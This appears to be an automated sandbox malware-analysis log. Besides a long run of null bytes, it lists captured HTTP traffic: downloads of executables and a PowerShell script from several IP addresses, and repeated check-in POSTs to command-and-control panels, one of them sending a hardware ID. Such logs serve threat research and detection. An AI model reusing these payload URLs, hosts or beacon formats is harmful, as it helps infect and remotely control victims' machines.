00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /frm/_vti_cnf/Blenar.exe HTTP/1.1Host: www.leopardi.nl
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 35 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000015002&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /test/blo.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 31 38 30 34 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000018042&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 39 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000019101&unit=246122658369
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000020001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 45 34 31 43 46 46 43 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBAE41CFFCFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="build"save------DHJKJKKKJJJKJKFHJJJJ--
Source: global traffic HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000004001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
